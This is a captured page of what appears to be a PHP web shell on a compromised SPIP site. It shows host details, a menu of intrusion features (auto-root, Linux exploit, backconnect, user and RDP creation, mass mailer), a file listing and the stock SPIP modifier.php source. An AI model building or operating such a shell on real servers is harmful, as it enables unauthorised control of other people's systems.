Linux webm008.cluster115.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.115.20.8 | : 216.73.216.59
Cant Read [ /etc/named.conf ]
8.1.34
quelfutuu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
quelfutuu /
www /
ecrire /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
acces.php
13.5
KB
-rw----r--
actions.php
5.36
KB
-rw----r--
admin.php
9.46
KB
-rw----r--
auth.php
22.43
KB
-rw----r--
auth_handler.php
300
B
-rw-r--r--
autoriser.php
64.83
KB
-rw----r--
bandeau.php
8.42
KB
-rw----r--
boutons.php
2.49
KB
-rw----r--
charsets.php
28.17
KB
-rw----r--
chercher_logo.php
3.3
KB
-rw----r--
chercher_rubrique.php
11.33
KB
-rw----r--
commencer_page.php
4.49
KB
-rw----r--
completer_traduction.php
2.43
KB
-rw----r--
config.php
13.96
KB
-rw----r--
cookie.php
6.21
KB
-rw----r--
couleurs.php
3.24
KB
-rw----r--
csv.php
3.76
KB
-rw----r--
cvt_autosave.php
4.26
KB
-rw----r--
cvt_configurer.php
7.92
KB
-rw----r--
cvt_multietapes.php
10.15
KB
-rw----r--
definir_menus_favoris.php
1.08
KB
-rw----r--
distant.php
43.91
KB
-rw----r--
documents.php
8.84
KB
-rw----r--
drapeau_edition.php
6.82
KB
-rw----r--
editer.php
22.05
KB
-rw----r--
email_valide.php
1.74
KB
-rw----r--
envoyer_mail.php
7.67
KB
-rw----r--
exporter_csv.php
7.37
KB
-rw----r--
filtres.php
162.08
KB
-rw----r--
filtres_alertes.php
8.29
KB
-rw----r--
filtres_boites.php
4.79
KB
-rw----r--
filtres_dates.php
34.68
KB
-rw----r--
filtres_ecrire.php
17.33
KB
-rw----r--
filtres_images_lib_mini.php
59.89
KB
-rw----r--
filtres_images_mini.php
16.78
KB
-rw----r--
filtres_mime.php
4.72
KB
-rw----r--
filtres_mini.php
6.9
KB
-rw----r--
filtres_selecteur_generique.ph...
8.25
KB
-rw----r--
flock.php
20.88
KB
-rw----r--
genie.php
6.86
KB
-rw----r--
headers.php
7.77
KB
-rw----r--
icone_renommer.php
2.12
KB
-rw----r--
iconifier.php
1.37
KB
-rw----r--
importer_csv.php
4.8
KB
-rw----r--
index.php
2
B
-rw----r--
informer.php
2.95
KB
-rw----r--
install.php
15.69
KB
-rw----r--
invalideur.php
7.99
KB
-rw----r--
journal.php
1.11
KB
-rw----r--
json.php
2.2
KB
-rw----r--
lang.php
14.59
KB
-rw----r--
lang_liste.php
7.23
KB
-rw----r--
layer.php
5.93
KB
-rw----r--
lien.php
8.43
KB
-rw----r--
lien_court.php
1.17
KB
-rw----r--
liens.php
680
B
-rw----r--
lister_objets.php
2.13
KB
-rw----r--
livrer_fichier.php
7.7
KB
-rw----r--
log.php
3.43
KB
-rw----r--
math.php
4.42
KB
-rw----r--
meta.php
9.09
KB
-rw----r--
minipres.php
3.7
KB
-rw----r--
modeles.php
1.42
KB
-rw----r--
modifier.php
11.09
KB
-rw----r--
nfslock.php
11.47
KB
-rw----r--
notifications.php
5.76
KB
-rw----r--
pipelines.php
7.83
KB
-rw----r--
pipelines_ecrire.php
12.04
KB
-rw----r--
plonger.php
3.98
KB
-rw----r--
plugin.php
47.39
KB
-rw----r--
precharger_article.php
2.26
KB
-rw----r--
precharger_objet.php
7.2
KB
-rw----r--
prepare_recherche.php
5.72
KB
-rw----r--
preselectionner_parent_nouvel_...
2.19
KB
-rw----r--
presentation.php
8.63
KB
-rw----r--
presentation_mini.php
8.28
KB
-rw----r--
presenter_enfants.php
6.75
KB
-rw----r--
puce_statut.php
11.94
KB
-rw----r--
queue.php
20.62
KB
-rw----r--
recherche_to_array.php
8.15
KB
-rw----r--
rechercher.php
11.05
KB
-rw----r--
roles.php
12.12
KB
-rw----r--
rubriques.php
28.48
KB
-rw----r--
securiser_action.php
11.99
KB
-rw----r--
selectionner.php
5.27
KB
-rw----r--
session.php
21.59
KB
-rw----r--
simplexml_to_array.php
2.84
KB
-rw----r--
surligne.php
4.14
KB
-rw----r--
svg.php
19.55
KB
-rw----r--
texte.php
11.82
KB
-rw----r--
texte_mini.php
23.49
KB
-rw----r--
traduire.php
11.26
KB
-rw----r--
urls.php
11.05
KB
-rw----r--
utils.php
107.33
KB
-rw----r--
xml.php
7.47
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : modifier.php
<?php /***************************************************************************\ * SPIP, Système de publication pour l'internet * * * * Copyright © avec tendresse depuis 2001 * * Arnaud Martin, Antoine Pitrou, Philippe Rivière, Emmanuel Saint-James * * * * Ce programme est un logiciel libre distribué sous licence GNU/GPL. * \***************************************************************************/ /** * Fonctions d'aides pour les fonctions d'objets de modification de contenus * * @package SPIP\Core\Objets\Modifications **/ if (!defined('_ECRIRE_INC_VERSION')) { return; } /** * Collecte des champs postés * * Fonction générique pour la collecte des posts * dans action/editer_xxx * * @param array $include_list * Les champs à récupérer * @param array $exclude_list * Les champs à ignorer * @param array|null $set * array : Tableau des champs postés * null : Les champs sont obtenus par des _request() sur les noms de la liste d’inclusion * @param bool $tous * true : Recupère tous les champs de white_list meme ceux n'ayant pas ete postés * @return array * Tableau des champs et valeurs collectées */ function collecter_requests($include_list, $exclude_list = [], $set = null, $tous = false) { $c = $set; if (!$c) { $c = []; foreach ($include_list as $champ) { // on ne collecte que les champs reellement envoyes par defaut. // le cas d'un envoi de valeur NULL peut du coup poser probleme. $val = _request($champ); if ($tous or $val !== null) { $c[$champ] = $val; } } // on ajoute toujours la lang en saisie possible // meme si pas prevu au depart pour l'objet concerne if ($l = _request('changer_lang')) { $c['lang'] = $l; } } foreach ($exclude_list as $champ) { unset($c[$champ]); } return $c; } /** * Modifie le contenu d'un objet * * Fonction generique pour l'API de modification de contenu, qui se * charge entre autres choses d'appeler les pipelines pre_edition * et post_edition * * Attention, pour éviter des hacks on interdit des champs * (statut, id_secteur, id_rubrique, id_parent), * mais la securite doit étre assurée en amont * * @api * @param string $objet * Type d'objet * @param int $id_objet * Identifiant de l'objet * @param array $options * array data : tableau des donnees sources utilisees pour la detection de conflit ($_POST sinon fourni ou si nul) * array nonvide : valeur par defaut des champs que l'on ne veut pas vide * string date_modif : champ a mettre a date('Y-m-d H:i:s') s'il y a modif * string invalideur : id de l'invalideur eventuel * array champs : non documente (utilise seulement par inc/rechercher ?) * string action : action realisee, passee aux pipelines pre/post edition (par defaut 'modifier') * bool indexation : deprecie * @param array|null $c * Couples champ/valeur à modifier * @param string $serveur * Nom du connecteur à la base de données * @return bool|string * - false : Aucune modification, aucun champ n'est à modifier * - chaîne vide : Vide si tout s'est bien passé * - chaîne : texte d'un message d'erreur */ function objet_modifier_champs($objet, $id_objet, $options, $c = null, $serveur = '') { if (!$id_objet = intval($id_objet)) { spip_log('Erreur $id_objet non defini', 'warn'); return _T('erreur_technique_enregistrement_impossible'); } include_spip('inc/filtres'); $table_objet = table_objet($objet, $serveur); $spip_table_objet = table_objet_sql($objet, $serveur); $id_table_objet = id_table_objet($objet, $serveur); $trouver_table = charger_fonction('trouver_table', 'base'); $desc = $trouver_table($spip_table_objet, $serveur); // Appels incomplets (sans $c) if (!is_array($c)) { spip_log('erreur appel objet_modifier_champs(' . $objet . '), manque $c'); return _T('erreur_technique_enregistrement_impossible'); } // Securite : certaines variables ne sont jamais acceptees ici // car elles ne relevent pas de autoriser(xxx, modifier) ; // il faut passer par instituer_XX() // TODO: faut-il passer ces variables interdites // dans un fichier de description separe ? unset($c['statut']); unset($c['id_parent']); unset($c['id_rubrique']); unset($c['id_secteur']); // Gerer les champs non vides if (isset($options['nonvide']) and is_array($options['nonvide'])) { foreach ($options['nonvide'] as $champ => $sinon) { if (isset($c[$champ]) and $c[$champ] === '') { $c[$champ] = $sinon; } } } // N'accepter que les champs qui existent dans la table $champs = array_intersect_key($c, $desc['field']); // et dont la valeur n'est pas null $champs = array_filter($champs, static function ($var) { return $var !== null; }); // TODO: ici aussi on peut valider les contenus // en fonction du type // Nettoyer les valeurs $champs = array_map('corriger_caracteres', $champs); // On récupère l'état avant toute modification $row = sql_fetsel('*', $spip_table_objet, $id_table_objet . '=' . $id_objet); // Envoyer aux plugins $champs = pipeline( 'pre_edition', [ 'args' => [ 'table' => $spip_table_objet, // compatibilite 'table_objet' => $table_objet, 'spip_table_objet' => $spip_table_objet, 'desc' => $desc, 'type' => $objet, // @deprecated 5.0 'objet' => $objet, 'id_objet' => $id_objet, 'data' => $options['data'] ?? null, 'champs' => $options['champs'] ?? [], // [doc] c'est quoi ? 'champs_anciens' => $row, // état du contenu avant modif 'serveur' => $serveur, 'action' => $options['action'] ?? 'modifier' ], 'data' => $champs ] ); if (!$champs) { return false; } // marquer le fait que l'objet est travaille par toto a telle date include_spip('inc/config'); if (lire_config('articles_modif', 'non') !== 'non') { include_spip('inc/drapeau_edition'); signale_edition($id_objet, $GLOBALS['visiteur_session'], $objet); } // Verifier si les mises a jour sont pertinentes, datees, en conflit etc include_spip('inc/editer'); if (!isset($options['data']) or is_null($options['data'])) { $options['data'] = &$_POST; } $conflits = controler_md5($champs, $options['data'], $objet, $id_objet, $serveur); // cas hypothetique : normalement inc/editer verifie en amont le conflit edition // et gere l'interface // ici on ne renvoie donc qu'un messsage d'erreur, au cas ou on y arrive quand meme if ($conflits) { return _T('titre_conflit_edition'); } if ($champs) { // cas particulier de la langue : passer par instituer_langue_objet if (isset($champs['lang'])) { if ($changer_lang = $champs['lang']) { $id_rubrique = 0; if (isset($desc['field']['id_rubrique'])) { $parent = ($objet == 'rubrique') ? 'id_parent' : 'id_rubrique'; $id_rubrique = sql_getfetsel($parent, $spip_table_objet, "$id_table_objet=" . intval($id_objet)); } $instituer_langue_objet = charger_fonction('instituer_langue_objet', 'action'); $champs['lang'] = $instituer_langue_objet($objet, $id_objet, $id_rubrique, $changer_lang, $serveur); } // on laisse 'lang' dans $champs, // ca permet de passer dans le pipeline post_edition et de journaliser // et ca ne gene pas qu'on refasse un sql_updateq dessus apres l'avoir // deja pris en compte } // la modif peut avoir lieu // faut-il ajouter date_modif ? if ( !empty($options['date_modif']) and !isset($champs[$options['date_modif']]) ) { $champs[$options['date_modif']] = date('Y-m-d H:i:s'); } // allez on commit la modif sql_updateq($spip_table_objet, $champs, "$id_table_objet=" . intval($id_objet), [], $serveur); // on verifie si elle est bien passee $moof = sql_fetsel( array_keys($champs), $spip_table_objet, "$id_table_objet=" . intval($id_objet), [], [], '', [], $serveur ); // si difference entre les champs, reperer les champs mal enregistres if ($moof != $champs) { $liste = []; foreach ($moof as $k => $v) { if ( $v !== $champs[$k] // ne pas alerter si le champ est numerique est que les valeurs sont equivalentes and (!is_numeric($v) or intval($v) !== intval($champs[$k])) // ne pas alerter si le champ est date, qu'on a envoye une valeur vide et qu'on recupere une date nulle and (strlen($champs[$k]) or !in_array($v, ['0000-00-00 00:00:00', '0000-00-00'])) ) { $liste[] = $k; $conflits[$k]['post'] = $champs[$k]; $conflits[$k]['save'] = $v; // cas specifique MySQL+emoji : si l'un est la // conversion utf8_noplanes de l'autre alors c'est OK if (defined('_MYSQL_NOPLANES') && _MYSQL_NOPLANES) { include_spip('inc/charsets'); if ($v == utf8_noplanes($champs[$k])) { array_pop($liste); } } } } // si un champ n'a pas ete correctement enregistre, loger et retourner une erreur // c'est un cas exceptionnel if (count($liste)) { spip_log( "Erreur enregistrement en base $objet/$id_objet champs :" . var_export($conflits, true), 'modifier.' . _LOG_CRITIQUE ); return _T( 'erreur_technique_enregistrement_champs', ['champs' => "<i>'" . implode("'</i>,<i>'", $liste) . "'</i>"] ); } } // Invalider les caches if (isset($options['invalideur']) and $options['invalideur']) { include_spip('inc/invalideur'); if (is_array($options['invalideur'])) { array_map('suivre_invalideur', $options['invalideur']); } else { suivre_invalideur($options['invalideur']); } } // Notifications, gestion des revisions... // en standard, appelle |nouvelle_revision ci-dessous pipeline( 'post_edition', [ 'args' => [ 'table' => $spip_table_objet, 'table_objet' => $table_objet, 'spip_table_objet' => $spip_table_objet, 'desc' => $desc, 'type' => $objet, // @deprecated 5.0 'objet' => $objet, 'id_objet' => $id_objet, 'champs' => $options['champs'] ?? [], // [doc] kesako ? 'champs_anciens' => $row, // état du contenu avant modif 'serveur' => $serveur, 'action' => $options['action'] ?? 'modifier' ], 'data' => $champs ] ); } // Appeler une notification if ($notifications = charger_fonction('notifications', 'inc')) { $notifications( "{$objet}_modifier", $id_objet, [ 'champs' => $champs, ] ); $notifications( 'objet_modifier', $id_objet, [ 'objet' => $objet, 'id_objet' => $id_objet, 'champs' => $champs, ] ); } // journaliser l'affaire // message a affiner :-) include_spip('inc/filtres_mini'); $qui = ''; if (!empty($GLOBALS['visiteur_session']['id_auteur'])) { $qui .= ' #id_auteur:' . $GLOBALS['visiteur_session']['id_auteur'] . '#'; } if (!empty($GLOBALS['visiteur_session']['nom'])) { $qui .= ' #nom:' . $GLOBALS['visiteur_session']['nom'] . '#'; } if ($qui == '') { $qui = '#ip:' . $GLOBALS['ip'] . '#'; } journal(_L($qui . ' a édité ' . $objet . ' ' . $id_objet . ' (' . join( '+', array_diff(array_keys($champs), ['date_modif']) ) . ')'), [ 'faire' => 'modifier', 'quoi' => $objet, 'id' => $id_objet ]); return ''; }
Close